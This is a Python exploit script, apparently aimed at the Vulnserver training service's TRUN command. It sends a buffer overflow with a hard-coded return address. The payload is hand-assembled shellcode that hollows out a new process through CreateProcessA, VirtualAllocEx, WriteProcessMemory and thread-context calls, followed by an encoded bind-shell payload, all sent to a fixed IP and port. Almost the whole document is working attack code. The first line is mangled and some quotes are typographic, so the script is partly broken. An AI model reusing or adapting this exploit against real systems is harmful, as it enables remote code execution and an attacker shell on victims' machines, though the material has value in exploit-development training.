#!/usr/bin/pythonimport socketimport syspayload="\xBA\x73\x7D\x74\x10" #

1. #!/usr/bin/python
2. import socket
3. import sys
4.  
5. payload="\xBA\x73\x7D\x74\x10" #MOV EDX,10747d73
6. payload+="\x81\xEA\x10\x10\x10\x10" #SUB EDX,10101010
7. payload+="\x52" #PUSH EDX
8. payload+="\x8B\xDC" #MOV EBX,ESP
9. payload+="\x33\xC9"#XOR ECX,ECX
10. payload+="\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51" #PUSH ECX
11. payload+="\x8B\xF4"#MOV ESI,ESP
12. payload+="\x8B\xFE"#MOV EDI,ESI
13. payload+="\x83\xC7\x04" #MOV ADD EDI,4
14. payload+="\x57" #PUSH EDI
15. payload+="\x56" #PUSH ESI
16. payload+="\x51\x51" #push ecx
17. payload+="\xB9\x05\x01\x01\x09" #mov ecx,9010105
18. payload+="\x81\xE9\x01\x01\x01\x01" #sub ecx,1010101
19. payload+="\x51" #PUSH ecx
20. payload+="\x33\xC9" #XOR ECX,ECX
21. payload+="\x51" #PUSH ecx
22. payload+="\x51" #PUSH ecx
23. payload+="\x51" #PUSH ecx
24. #payload+="\x51" #PUSH ecx
25. payload+="\x53" #PUSH ebx
26. payload+="\x51" #PUSH ecx
27. payload+="\xBB\x82\x20\xDE\x77" #MOV EBX,CreateProcessA
28. payload+="\xff\xd3" #Call EBX
29.  
30. payload+="\x5E" #pop esi
31. payload+="\x5E" #pop esi store
32. payload+="\x5f" #pop edi
33. payload+="\x6A\x40" #PUSH 40 flprotect PAGE_EXECUTE_READWRITE
34. payload+="\x33\xC9" #XOR ECX,ECX
35. payload+="\xb5\x30" #MOV CH,30
36. payload+="\x51" #PUSH ECX flAllocationType
37. payload+="\xb5\x01" #MOV CH,01
38. payload+="\xb1\xf4" #MOV CL,0F4
39. payload+="\x51" #PUSH ECX
40. payload+="\x33\xC9" #XOR ECX,ECX
41. payload+="\x51" #PUSH ECX
42. payload+="\x56" #PUSH ESI
43. payload+="\xBB\xB6\xc1\xe1\x77"#MOV EBX,kernel32.VirtualallocEx payload+="\xBB\xB6\xc1\xe1\x77″
44. payload+="\xff\xd3" #Call EBX
45. payload+="\x8B\xE8" #MOV EBP,EAX
46.  
47. payload+="\x33\xdb" #XOR EBX,EBX
48. payload+="\x53"#PUSH EBX
49. payload+="\xb7\x01"#MOV BH,1
50. payload+="\xb3\xf4"#MOV bl,0f4
51. payload+="\x53" #PUSH EBX
52. payload+="\x8b\xdc"#mov EBX,ESP
53. payload+="\x66\x81\xC3\x74\x02" #ADD BX,274
54. payload+="\x53" #PUSH EBX
55. payload+="\x50" #PUSH EAX
56. payload+="\x56" #PUSH ESI
57. payload+="\xBB\xde\xC1\xe1\x77" #MOV EBX,kernel32.writeProcessMEMORY
58. payload+="\xff\xd3" #Call EBX
59.  
60. payload+="\x8b\xdc"#MOV EBX,ESP
61. payload+="\x66\x81\xEB\x50\x01" #SUB BX,150
62. payload+="\x33\xc9" #XOR ECX,ECX
63. payload+="\x66\xB9\xff\xff"#MOV CX,0xffff
64. payload+="\x41" #inc ecx
65. payload+="\x41" #inc ecx
66. payload+="\x89\x0B"#MOV DWORD[EBX],ECX
67. payload+="\x53"#PUSH ECX
68. payload+="\x57"#PUSH EDI
69. payload+="\xB9\xC1\x0C\xE4\x77"#MOV ECX,kernel32.GetThreadContext
70. payload+="\xff\xd1" #Call ECX
71.  
72. payload+="\x8b\xcb"#MOV ECX,EbX
73. payload+="\x80\xc1\xb8" #ADD CL,0xb8
74. payload+="\x80\xc5\x01" #ADD CH,0x1
75. payload+="\x89\x29" #MOV DWORD [ECX],EBP
76. payload+="\x53" #PUSH EDX
77. payload+="\x57" #PUSH EDI
78. payload+="\xbb\x93\x01\xe7\x77" #mov ebx,kernel32.SetThreadContext
79. payload+="\xff\xd3" #Call EBX
80.  
81. payload+="\x57" #PUSH EDI
82. payload+="\xbb\x1c\x0f\xe2\x77"#MOV EBX,kernel32.ResumeThread
83. payload+="\xff\xd3" #Call EBX
84.  
85. payload+="\x33\xc9" #XOR ECX,ECX
86. payload+="\x51" #PUSH ECX
87. payload+="\xBB\x4f\x21\xe3\x77" #mov ebx,kernel32.ExitProcess
88. payload+="\xff\xd3" #Call EBX
89.  
90. sleep=""
91. sleep+="\x33\xc9" #XOR ECX,ECX
92. sleep+="\xB1\x88" #MOV CL,88
93. sleep+="\xB5\x13" #MOV CH,13
94. sleep+="\x51" #PUSH ECX
95. sleep+="\xbb\x46\xba\xe2\x77" #MOV EBX,kernel32.Sleep
96. sleep+="\xff\xd3" #Call EBX
97.  
98. bind_shell=("\xda\xc2\xd9\x74\x24\xf4\xbd\x90\xac\x38\xd9\x58\x29\xc9\xb1"
99. "\x53\x31\x68\x17\x83\xc0\x04\x03\xf8\xbf\xda\x2c\x04\x57\x98"
100. "\xcf\xf4\xa8\xfd\x46\x11\x99\x3d\x3c\x52\x8a\x8d\x36\x36\x27"
101. "\x65\x1a\xa2\xbc\x0b\xb3\xc5\x75\xa1\xe5\xe8\x86\x9a\xd6\x6b"
102. "\x05\xe1\x0a\x4b\x34\x2a\x5f\x8a\x71\x57\x92\xde\x2a\x13\x01"
103. "\xce\x5f\x69\x9a\x65\x13\x7f\x9a\x9a\xe4\x7e\x8b\x0d\x7e\xd9"
104. "\x0b\xac\x53\x51\x02\xb6\xb0\x5c\xdc\x4d\x02\x2a\xdf\x87\x5a"
105. "\xd3\x4c\xe6\x52\x26\x8c\x2f\x54\xd9\xfb\x59\xa6\x64\xfc\x9e"
106. "\xd4\xb2\x89\x04\x7e\x30\x29\xe0\x7e\x95\xac\x63\x8c\x52\xba"
107. "\x2b\x91\x65\x6f\x40\xad\xee\x8e\x86\x27\xb4\xb4\x02\x63\x6e"
108. "\xd4\x13\xc9\xc1\xe9\x43\xb2\xbe\x4f\x08\x5f\xaa\xfd\x53\x08"
109. "\x1f\xcc\x6b\xc8\x37\x47\x18\xfa\x98\xf3\xb6\xb6\x51\xda\x41"
110. "\xb8\x4b\x9a\xdd\x47\x74\xdb\xf4\x83\x20\x8b\x6e\x25\x49\x40"
111. "\x6e\xca\x9c\xfd\x66\x6d\x4f\xe0\x8b\xcd\x3f\xa4\x23\xa6\x55"
112. "\x2b\x1c\xd6\x55\xe1\x35\x7f\xa8\x0a\x1e\x8f\x25\xec\x0a\x9f"
113. "\x63\xa6\xa2\x5d\x50\x7f\x55\x9d\xb2\xd7\xf1\xd6\xd4\xe0\xfe"
114. "\xe6\xf2\x46\x68\x6d\x11\x53\x89\x72\x3c\xf3\xde\xe5\xca\x92"
115. "\xad\x94\xcb\xbe\x45\x34\x59\x25\x95\x33\x42\xf2\xc2\x14\xb4"
116. "\x0b\x86\x88\xef\xa5\xb4\x50\x69\x8d\x7c\x8f\x4a\x10\x7d\x42"
117. "\xf6\x36\x6d\x9a\xf7\x72\xd9\x72\xae\x2c\xb7\x34\x18\x9f\x61"
118. "\xef\xf7\x49\xe5\x76\x34\x4a\x73\x77\x11\x3c\x9b\xc6\xcc\x79"
119. "\xa4\xe7\x98\x8d\xdd\x15\x39\x71\x34\x9e\x49\x38\x14\xb7\xc1"
120. "\xe5\xcd\x85\x8f\x15\x38\xc9\xa9\x95\xc8\xb2\x4d\x85\xb9\xb7"
121. "\x0a\x01\x52\xca\x03\xe4\x54\x79\x23\x2d")
122.  
123. shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + payload + "C"*(2500-len(payload)-4-2003-10)+"\x90"*100+sleep+"\x90"*10+bind_shell #625011af
124.  
125. try:
126. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
127. connect=s.connect((‘172.16.12.204’,9999))
128. s.send((‘TRUN /.:/’+shellcode))
129. print("Fuzzing with TRUN comamnd with %s bytes"% str(len(shellcode)))
130. s.close()
131. except:
132. print("Error connecting to server")
133. sys.exit()